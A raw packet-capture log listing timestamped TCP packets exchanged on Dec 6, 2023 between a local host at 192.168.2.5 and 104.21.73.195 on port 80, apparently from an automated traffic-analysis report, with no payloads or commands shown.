                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827729940 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827753067 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827769995 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827800989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827831984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.827836990 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828155994 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828167915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828192949 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828208923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828222036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828243971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828265905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828289032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828309059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828342915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828375101 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828393936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828417063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828453064 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828458071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828506947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828520060 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828537941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828556061 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828589916 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828609943 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828898907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828912020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828934908 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828953028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828965902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.828985929 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829046965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829060078 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829085112 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829103947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829118013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829143047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829144955 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829181910 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829196930 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829245090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829258919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829277039 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829298973 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829340935 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829360962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829683065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829695940 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829720974 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829782009 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829823017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829843044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829855919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829890966 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829910994 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829924107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829936028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829947948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829960108 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829971075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.829979897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830027103 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830060005 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830066919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830137968 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830151081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830172062 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830634117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830671072 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830703020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830717087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830749035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830811024 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830857038 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830868959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830890894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830898046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830903053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.830935001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831134081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831171036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831233025 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831247091 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831259012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831269979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831279993 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831281900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831300020 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831307888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831340075 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831423998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831437111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831473112 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831490993 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831512928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831548929 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831566095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831588984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831621885 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.831641912 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832066059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832103968 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832109928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832122087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832134008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832151890 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832175016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832197905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832207918 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832288980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832302094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832314014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832324982 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832330942 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832353115 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832353115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832376003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832386971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832398891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832428932 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832432032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.832971096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833003044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833009005 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833082914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833116055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833170891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833184004 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833194971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833214998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833221912 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833246946 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833255053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833308935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833321095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833345890 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833357096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833369970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833390951 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833393097 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833431959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833431959 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833898067 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833930969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.833935976 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834084034 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834096909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834116936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834136009 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834167957 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834184885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834197998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834209919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834235907 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834427118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834439039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834461927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834462881 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834486008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834496975 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834547043 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834559917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834570885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834580898 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834582090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834605932 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834660053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834672928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834685087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834696054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834708929 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834722996 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834813118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834825993 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.834849119 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835334063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835346937 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835357904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835377932 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835391998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835396051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835405111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835444927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835468054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835529089 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835542917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835555077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835571051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835587025 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835592031 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835599899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835640907 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835665941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835688114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835700989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.835727930 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836247921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836285114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836304903 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836306095 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836327076 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836338997 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836378098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836410046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836426020 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836450100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836493969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836507082 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836508989 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836518049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836563110 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836563110 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836575031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836586952 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836599112 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836600065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836632967 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836661100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.836694002 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837341070 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837353945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837399006 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837404013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837418079 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837450027 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837471962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837485075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837507963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837531090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837578058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837591887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837604046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837614059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837641001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837661982 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837675095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837687016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837698936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837721109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837723017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.837742090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838151932 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838165045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838192940 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838196993 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838211060 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838232040 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838254929 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838293076 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838301897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838315010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838354111 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838360071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838375092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838386059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838397026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838407040 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838418961 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838430882 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838450909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.838485956 CET4970680192.168.2.5104.21.73.195
